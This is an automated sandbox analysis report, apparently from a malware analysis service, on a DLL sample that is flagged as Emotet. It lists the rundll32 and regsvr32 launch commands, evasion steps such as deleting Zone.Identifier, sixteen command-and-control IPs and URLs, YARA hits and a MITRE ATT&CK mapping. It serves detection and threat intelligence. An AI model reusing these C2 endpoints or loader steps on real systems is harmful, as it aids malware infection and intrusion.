                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -s W32Time
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\psIFSn7VLi.dll
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\psIFSn7VLi.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\psIFSn7VLi.dll,DllUnregisterServer
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Arwhu\ttgk.pdy"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@29/8@2/57
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003D09A __EH_prolog,VariantClear,SysAllocStringByteLen,CoCreateInstance,CoCreateInstance,CoCreateInstance,
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3388:120:WilError_01
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002EA60 FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003E8D0 push eax; ret
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003E8D0 push eax; ret
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003F964 push eax; ret
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10040CB7 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10040CB7 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003E8D0 push eax; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003E8D0 push eax; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003F964 push eax; ret
                      Source: psIFSn7VLi.dllStatic PE information: section name: .didat
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10049401 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\psIFSn7VLi.dll
                      Source: C:\Windows\SysWOW64\regsvr32.exePE file moved: C:\Windows\SysWOW64\Arwhu\ttgk.pdyJump to behavior
                      Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Arwhu\ttgk.pdy:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Pwywyaihuigj\xpxapuj.ypc:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Hryrotqgbtbdfp\yklzymlfbv.qfq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10039047 IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10039047 IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe TID: 6284Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6280Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6856Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 6.4 %
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 6.3 %
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003E90D VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: svchost.exe, 00000014.00000002.664670317.000001697E829000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@`
                      Source: regsvr32.exe, 00000006.00000003.365060100.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410649801.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.365020565.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410742618.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.665412089.000001697FE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.665370507.000001697FE56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.421185062.0000015C89E82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000000B.00000002.761522044.0000024B7AA02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 0000000B.00000002.761730487.0000024B7AA28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.762160897.00000276B2E44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.761947130.0000027206429000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.761938638.00000136BA229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10049401 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1000D140 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,memcpy,
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 149.56.128.192 443
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 185.157.82.211 8080
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 79.172.212.216 8080
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 131.100.24.231 80
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 46.55.222.11 443
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 51.91.76.89 8080
                      Source: C:\Windows\System32\svchost.exeDomain query: time.windows.com
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 173.254.208.91 8080
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 160.16.218.63 8080
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 206.188.212.92 8080
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 192.99.251.50 443
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 51.91.7.5 8080
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 159.8.59.82 8080
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 120.50.40.183 80
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 58.227.42.236 80
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 103.221.221.247 8080
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1
                      Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,_strncpy,
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strlen,EnumSystemLocalesA,
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strlen,_strlen,EnumSystemLocalesA,
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strlen,EnumSystemLocalesA,
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,EnumSystemLocalesA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,EnumSystemLocalesA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,EnumSystemLocalesA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,
                      Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10045190 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10048415 __lock,_strlen,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy,
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10001078 lstrcmpiW,GetVersion,InterlockedExchange,

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 00000010.00000002.761873992.0000020E5823D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 00000010.00000002.762125761.0000020E58302000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.761658717.0000020E58213000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4df0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4f10000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.4590000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3530000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.9c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2940000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3530000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4dc0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.9c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4dc0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2940000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.247001370.0000000004231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.762864021.0000000004591000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.246952927.0000000002940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.246760873.0000000003530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.761637752.00000000009C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.250264890.0000000004DF1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.250193606.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.246960941.0000000004F11000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		OS Credential Dumping2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium3
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Native API                      		1
                      Windows Service                      		1
                      Windows Service                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory1
                      File and Directory Discovery                      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)111
                      Process Injection                      		2
                      Obfuscated Files or Information                      		Security Account Manager36
                      System Information Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Standard Port                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      DLL Side-Loading                      		NTDS51
                      Security Software Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer3
                      Non-Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      File Deletion                      		LSA Secrets3
                      Virtualization/Sandbox Evasion                      		SSHKeyloggingData Transfer Size Limits14
                      Application Layer Protocol                      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common21
                      Masquerading                      		Cached Domain Credentials1
                      Process Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items3
                      Virtualization/Sandbox Evasion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
                      Process Injection                      		Proc Filesystem1
                      Remote System Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      Hidden Files and Directories                      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                      Regsvr32                      		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                      Rundll32                      		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 669356 Sample: psIFSn7VLi Startdate: 20/07/2022 Architecture: WINDOWS Score: 100 37 129.232.188.93 xneeloZA South Africa 2->37 39 185.8.212.130 UZINFOCOMUZ Uzbekistan 2->39 41 39 other IPs or domains 2->41 55 Snort IDS alert for network traffic 2->55 57 Multi AV Scanner detection for domain / URL 2->57 59 Antivirus detection for URL or domain 2->59 61 3 other signatures 2->61 8 loaddll32.exe 1 2->8         started        10 svchost.exe 2->10         started        13 svchost.exe 1 2->13         started        15 11 other processes 2->15 signatures3 process4 dnsIp5 18 regsvr32.exe 5 8->18         started        21 cmd.exe 1 8->21         started        23 rundll32.exe 2 8->23         started        25 rundll32.exe 8->25         started        63 Changes security center settings (notifications, updates, antivirus, firewall) 10->63 27 MpCmdRun.exe 1 10->27         started        65 System process connects to network (likely due to code injection or exploit) 13->65 49 127.0.0.1 unknown unknown 15->49 51 time.windows.com 15->51 signatures6 process7 signatures8 53 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->53 29 regsvr32.exe 12 18->29         started        33 rundll32.exe 2 21->33         started        35 conhost.exe 27->35         started        process9 dnsIp10 43 79.172.212.216, 49864, 8080 SZERVERPLEXHU Hungary 29->43 45 159.8.59.82, 8080 SOFTLAYERUS United States 29->45 47 13 other IPs or domains 29->47 67 System process connects to network (likely due to code injection or exploit) 29->67 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 33->69 signatures11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      psIFSn7VLi.dll64%VirustotalBrowse

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.2.rundll32.exe.3530000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      6.2.regsvr32.exe.4590000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.regsvr32.exe.4dc0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      4.2.rundll32.exe.2940000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      4.2.rundll32.exe.4230000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.regsvr32.exe.4df0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.rundll32.exe.4f10000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.2.regsvr32.exe.9c0000.0.unpack100%AviraHEUR/AGEN.1215461Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://51.91.76.89:8080/WUUUrykRKzQgKnGAgOWXwbTPpbZjnbjXYyUgItVQHAlMtltf100%Avira URL Cloudmalware
                      https://51.91.7.5/17%VirustotalBrowse
                      https://51.91.7.5/100%Avira URL Cloudmalware
                      https://206.188.212.92:8080/WvwiYegTHwVudezOCrWPjYKhpMeUQep100%Avira URL Cloudmalware
                      https://46.55.222.11/TBwKHjQjVeCWIQFS100%Avira URL Cloudmalware
                      https://58.227.42.236/0%Avira URL Cloudsafe
                      https://79.172.212.216:8080/VNwOftDFidReElfWGyCwgb100%Avira URL Cloudmalware
                      https://192.99.251.50/njigQUBviBvfjJoFmpOFCcuxzCMjisKOYgnAJJuZGrOYExdzIkjfPaaGvSwrlp100%Avira URL Cloudmalware
                      https://46.55.222.11/.50.40.183:80/YQXxdxwQWLyBEVjMOlgty100%Avira URL Cloudmalware
                      https://120.50.40.183/rosoft100%Avira URL Cloudmalware
                      https://58.227.42.236:80/CBvqXjPjXUGuuflNLuZWkXecSmHukPuGWkGWJXlIStqkcdnP0%Avira URL Cloudsafe
                      https://51.91.7.5:8080/EEsdElRrfqZScZWLqBhRqLSt100%Avira URL Cloudmalware
                      https://103.221.221.247:8080/100%Avira URL Cloudmalware
                      https://131.100.24.231:80/MIMNtRZxLqGHZoTXVDtaMauEeLlGAjcyCUbpgyHmvtdbZTHIDbPoaw100%Avira URL Cloudmalware
                      https://192.99.251.50/:100%Avira URL Cloudmalware
                      https://192.99.251.50/F100%Avira URL Cloudmalware
                      https://58.227.42.236:80/CBvqXjPjXUGuuflNLuZWkXecSmHukPuGWkGWJXlIStqkcdnPK0%Avira URL Cloudsafe
                      https://192.99.251.50/100%Avira URL Cloudmalware
                      https://131.100.24.231/100%Avira URL Cloudmalware
                      https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLE3062332-1002100%Avira URL Cloudmalware
                      https://46.55.222.11/TBwKHjQjVeCWIQFSz100%Avira URL Cloudmalware
                      https://149.56.128.192/SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX-100%Avira URL Cloudmalware
                      http://crl.ver)0%Avira URL Cloudsafe
